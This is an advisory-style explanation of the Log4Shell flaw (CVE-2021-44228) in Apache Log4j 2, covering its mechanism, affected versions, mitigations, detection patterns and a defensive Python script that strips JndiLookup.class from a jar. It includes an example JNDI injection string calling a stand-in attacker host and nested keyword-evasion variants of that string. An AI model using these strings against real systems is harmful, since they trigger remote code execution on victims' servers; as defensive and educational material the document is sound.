CVE-2021-44228 The JNDI features used in Log4j2 do not protect against attacker-controlled LDAP and other JNDI endpoints.

CVE-2021-44228, widely known as Log4Shell, is a remote code execution flaw in Apache Log4j 2. When message lookup substitution is enabled (the default before 2.15.0), Log4j expands ${...} lookup expressions found in the text it is asked to log. The jndi lookup lets such an expression name a JNDI endpoint, typically an LDAP or RMI server, and Log4j resolves it without restricting where that endpoint is or what it may return. An attacker who can get a string such as ${jndi:ldap://attacker.example/a} into any logged value (an HTTP header, a username, a form field) therefore makes the application connect to a server the attacker controls; the reply can point the JVM at a remote class or carry a serialized object, and the attacker's code then runs with the privileges of the application process. The LDAP server is the attacker's tool, not the victim: the target is the application that does the logging, no login of any kind is involved, and nothing is required of the victim beyond logging the input. The flaw is particularly dangerous because Log4j is embedded in a great deal of third-party and vendor software, including SCADA and Industrial Control Systems products, carrier billing and account management systems, e-commerce platforms, financial services, government, healthcare and manufacturing applications, often without the operator knowing it is present. The attack is also quiet: from the application's side it is an ordinary log statement followed by an outbound connection, and nothing is shown to an end user.

Vulnerability details

Log4j 2 resolves lookups with its StrSubstitutor when it formats a log event, and one of the registered lookups is JndiLookup, which performs a JNDI lookup on whatever name follows the jndi: prefix. Before 2.15.0 this substitution was applied to the message text and its parameters, not only to configuration values, so attacker-supplied input reached the lookup. JNDI hands the name to the LDAP or RMI provider, which on many JVMs fetched and instantiated remote class references without restriction; even where remote class loading is disabled, an LDAP response can carry a serialized Java object that the application deserializes. Lookups can also be nested, so the literal string jndi need not appear in the input: ${${lower:j}ndi:ldap://...} expands to the same thing, which defeats simple keyword filters. Affected versions are Log4j 2 from 2.0-beta9 up to and including 2.14.1 in their default configuration; 2.15.0 disabled message lookups by default, and 2.16.0 (along with the security releases 2.12.2, 2.12.3 and 2.3.1 for older branches) removed the feature. The issue is specific to log4j-core; Log4j 1.x has no lookup mechanism and is not affected by this CVE, and log4net and log4cxx are not affected.
Because Log4j is so widely bundled, the flaw commonly surfaces in third-party and vendor products whose operators do not know which logging library they ship. Exploitation yields code execution inside the application process on the victim host, with whatever privileges that process has; the LDAP server involved is the attacker's own.

Vulnerability Overview

Apache Log4j 2 resolves JNDI lookups embedded in log messages without restricting the endpoint, so a single attacker-supplied string in any logged field gives unauthenticated remote code execution in the application that logs it. The vulnerability is rated CVSS 3.1 10.0 (Critical): network attack vector, low complexity, no privileges and no user interaction required. The code runs with the privileges of the application process, not of any LDAP server. Exposure is broad because Log4j is bundled in many third-party and vendor products, including SCADA and Industrial Control Systems software, and such products are often not inventoried as Java applications. Exploitation is quiet from the victim's side: the application sees an ordinary log call and an outbound LDAP or RMI connection, and nothing is shown to an end user.

Mitigation and Detection

Vendors published product-specific advisories; Cisco, for example, issued its own security advisory for CVE-2021-44228 listing the affected Cisco software and hardware platforms and the releases that fix them. For anything that bundles log4j-core, the fix is to upgrade: 2.15.0 addressed this CVE, and later 2.x releases address follow-on issues (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832), so deploy the latest 2.x release rather than 2.15.0. Where an upgrade is not immediately possible, for 2.10 and later set the system property log4j2.formatMsgNoLookups=true or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true (this is only partially effective in some non-default pattern layouts, which is what CVE-2021-45046 covers); for earlier versions, remove JndiLookup.class from the log4j-core jar on the classpath. Blocking outbound LDAP, RMI and DNS from application servers blunts the retrieval step but does not remove the bug.
For detection, search web, proxy and application logs for ${jndi: and its obfuscated variants (nested ${lower:...}, ${upper:...}, ${::-x} and ${env:...:-x} lookups), alert on unexpected outbound connections from Java processes to LDAP (389, 636 or arbitrary high ports), RMI (1099) or unknown DNS resolvers, and inventory jars for log4j-core, including copies nested inside other jars, wars and ears.
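An added example, not code from the original page, from Cisco or from the Log4j project: a Python script that inventories a log4j-core jar (reading the Maven version recorded under META-INF) and writes a copy with JndiLookup.class removed, which is the classpath workaround for releases older than 2.10. It builds a constructed stand-in jar with the real entry names and dummy class bytes so it runs offline; the file names and the demo() helper are assumptions of the example, while the two entry paths are the ones a real log4j-core jar uses.

```python
import os
import tempfile
import zipfile

# Entry paths as they appear inside a real log4j-core jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def jar_version(jar_path):
    """Return the Maven version recorded in the jar's pom.properties, or None."""
    with zipfile.ZipFile(jar_path) as jar:
        if POM_PROPERTIES not in jar.namelist():
            return None
        for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            key, sep, value = line.partition("=")
            if sep and key.strip() == "version":
                return value.strip()
    return None


def has_jndi_lookup(jar_path):
    """True if the jar still ships the class that implements ${jndi:...}."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def strip_jndi_lookup(src_jar, dst_jar):
    """Write a copy of src_jar without JndiLookup.class and return how many entries
    were dropped. Every other entry is copied with its original metadata, so the
    result matches what 'zip -q -d' produces. Never edit a jar in place while a
    JVM has it open; swap the file and restart the process."""
    dropped = 0
    with zipfile.ZipFile(src_jar) as src, zipfile.ZipFile(dst_jar, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                dropped += 1
                continue
            dst.writestr(info, src.read(info.filename))
    return dropped


def build_fixture_jar(path, version="2.14.1"):
    """Constructed stand-in for a vulnerable log4j-core jar: real entry names,
    dummy class bytes. Returns the sorted entry names for later comparison."""
    entries = {
        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
        POM_PROPERTIES: (
            "groupId=org.apache.logging.log4j\n"
            "artifactId=log4j-core\n"
            f"version={version}\n"
        ).encode(),
        "org/apache/logging/log4j/core/Logger.class": b"\xca\xfe\xba\xbe",
        JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe",
    }
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        for name, data in entries.items():
            jar.writestr(name, data)
    return sorted(entries)


def demo():
    """Build the fixture, remediate a copy, and report what a scanner would see."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "log4j-core-2.14.1.jar")
        dst = os.path.join(tmp, "log4j-core-2.14.1-nojndi.jar")
        names = build_fixture_jar(src)
        before = has_jndi_lookup(src)
        dropped = strip_jndi_lookup(src, dst)
        with zipfile.ZipFile(dst) as jar:
            remaining = sorted(jar.namelist())
        return {
            "version": jar_version(src),
            "before": before,
            "dropped": dropped,
            "after": has_jndi_lookup(dst),
            "other_entries_intact": remaining == [n for n in names if n != JNDI_LOOKUP_CLASS],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real host the equivalent one-liner is zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class, followed by a restart of every JVM that loaded the jar. Check jars nested inside wars, ears and fat jars as well, since those are the copies inventory tools most often miss, and treat the version string as a hint only: a jar that has been patched by class removal still reports its original version.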

Exploitation Details

The attacker never needs to log into anything. The preconditions are that the target runs a vulnerable log4j-core, that message lookups are enabled (the default), that some attacker-controlled value reaches a log statement, and that the process can reach the attacker's endpoint. Typical injection points are HTTP request headers such as User-Agent and X-Forwarded-For, login usernames, search and form fields, and any other value an application logs on receipt. The attacker hosts an LDAP or RMI server that answers the lookup with a reference to a class on a web server the attacker also controls, or with a serialized object that a gadget class already on the application's classpath executes on deserialization. Because the code runs inside the application, a SCADA or other control systems product that embeds log4j hands the attacker the same access to the host and to any connected devices that the product itself has.
